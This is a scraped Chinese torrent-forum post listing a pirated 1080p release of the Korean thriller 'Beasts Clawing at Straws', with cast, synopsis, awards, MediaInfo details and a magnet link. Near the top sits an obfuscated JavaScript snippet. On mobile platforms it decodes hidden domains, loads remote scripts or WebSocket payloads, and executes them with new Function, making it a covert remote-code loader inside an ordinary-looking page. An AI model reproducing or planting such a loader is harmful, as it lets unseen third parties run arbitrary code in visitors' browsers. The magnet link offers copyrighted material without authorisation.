抓住稻草的野兽[中文字幕].Beasts.Clawing.at.Straws.2020.1080p.迅雷下载 3.24GB

版主小s 1月前 821

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 抓住稻草的野兽 / 笼子里的野兽(港) / 垂死挣扎的野兽们 / 抓住救命稻草的野兽们(台) / Beasts Clawing at Straws / Beasts That Cling to the Straw

◎片 名 ?????? ?? ?? ???

◎年 代 2020

◎产 地 韩国

◎类 别 惊悚 / 犯罪

◎语 言 韩语

◎上映日期 2020-02-21(韩国)

◎IMDb链接 https://www.imdb.com/title/tt9747594/

◎豆瓣评分 7.0/10 (16726人评价)

◎豆瓣链接 https://movie.douban.com/subject/30180781/

◎片 长 108分钟

◎导 演 金容勋 Yong-hoon Kim (id:1404506)

◎编 剧 金容勋 Yong-hoon Kim (id:1404506)

曾根圭介 Keisuke Sone (id:1404507)

◎演 员 全度妍 Do-yeon Jeon (id:1067813)

郑雨盛 Woo-sung Jung (id:1032365)

裴晟祐 Sung-Woo Bae (id:1350654)

尹汝贞 Yeo-jeong Yoon (id:1275611)

郑满植 Man-shik Jeong (id:1327294)

陈庆 Jin Gyeong (id:1336400)

申贤彬 Hyun-bin Shin (id:1377767)

郑家蓝 Ga-ram Jung (id:1373071)

金俊翰 Joon-han Kim (id:1382575)

朴智焕 Park Ji-hwan (id:1382226)

许栋元 Heo Dong-won (id:1379562)

裴振雄 Jin-woong Bae (id:1381049)

林皓俊 Im Ho-joon (id:1436792)

李学周 Hak-joo Lee (id:1378899)

朴正民 Jeong-min Park (id:1335493)

Nene Kang Nene Kang (id:1449455)

韩美妍 Meeyeon Han (id:1449454)

◎标 签 犯罪 / 韩国 / 悬疑 / 韩国电影 / 全度妍 / 剧情 / 2020 / 郑雨盛

◎简 介

因失踪的恋人而负债累累的泰荣(郑雨盛饰)、辛苦打工却只能勉强维持生计的一家之长忠万(裴成宇饰)、想要洗白过去而觊觎他人所有的妍希(全度妍饰),以及高利贷放贷者朴社长(郑满植饰)、因欠债而家庭破碎的美兰(申贤彬饰)、非法滞留者镇泰(郑家蓝饰)、一心为家人而活的英善(陈庆饰)、失忆的顺子(尹汝贞饰),所有身处困境的这些人,都将一个钱袋视为自己人生的最后机会,从而引发了一连串始料未及的事件。

◎获奖情况 (共6项)

第41届韩国电影青龙奖 (2020)

最佳女主角(提名)

└──全度妍 (id:1067813)

最佳新人男演员(提名)

└──李学周 (id:1378899)

最佳新人女演员(提名)

└──申贤彬 (id:1377767)

最佳剪辑

第49届鹿特丹国际电影节 (2020)

老虎奖 特别荣誉

└──金容勋 (id:1404506)

老虎奖(提名)

└──金容勋 (id:1404506)

  1. General

  2. Unique ID : 15747440301291748556243496459689822642 (0xBD8D8C02D04BE460B8B3B8A439089B2)

  3. Complete name : [email protected]EB.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 3.24 GiB

  7. Duration : 1 h 44 min

  8. Overall bit rate : 4 455 kb/s

  9. Encoded date : UTC 2021-06-30 08:22:34

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@High

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 44 min

  19. Bit rate : 4 328 kb/s

  20. Width : 1 920 pixels

  21. Height : 800 pixels

  22. Display aspect ratio : 2.40:1

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.117

  29. Stream size : 3.15 GiB (97%)

  30. Default : Yes

  31. Forced : No


  32. Audio

  33. ID : 2

  34. Format : AAC LC

  35. Format/Info : Advanced Audio Codec Low Complexity

  36. Codec ID : A_AAC-2

  37. Duration : 1 h 44 min

  38. Bit rate : 124 kb/s

  39. Channel(s) : 2 channels

  40. Channel layout : L R

  41. Sampling rate : 44.1 kHz

  42. Frame rate : 43.066 FPS (1024 SPF)

  43. Compression mode : Lossy

  44. Stream size : 92.7 MiB (3%)

  45. Language : Korean

  46. Default : Yes

  47. Forced : No


  48. Text #1

  49. ID : 3

  50. Format : UTF-8

  51. Codec ID : S_TEXT/UTF8

  52. Codec ID/Info : UTF-8 Plain Text

  53. Duration : 1 h 37 min

  54. Bit rate : 39 b/s

  55. Count of elements : 1327

  56. Stream size : 27.8 KiB (0%)

  57. Title : Chinese Simplified

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Text #2

  62. ID : 4

  63. Format : UTF-8

  64. Codec ID : S_TEXT/UTF8

  65. Codec ID/Info : UTF-8 Plain Text

  66. Duration : 1 h 37 min

  67. Bit rate : 39 b/s

  68. Count of elements : 1327

  69. Stream size : 27.8 KiB (0%)

  70. Title : Chinese Traditional

  71. Language : Chinese

  72. Default : No

  73. Forced : No


  74. Text #3

  75. ID : 5

  76. Format : UTF-8

  77. Codec ID : S_TEXT/UTF8

  78. Codec ID/Info : UTF-8 Plain Text

  79. Duration : 1 h 37 min

  80. Bit rate : 44 b/s

  81. Count of elements : 1327

  82. Stream size : 32.0 KiB (0%)

  83. Title : English

  84. Language : English

  85. Default : No

  86. Forced : No


TAGS 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:77BC29478AE0C1BC9AC6F22433281B70615EB58D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回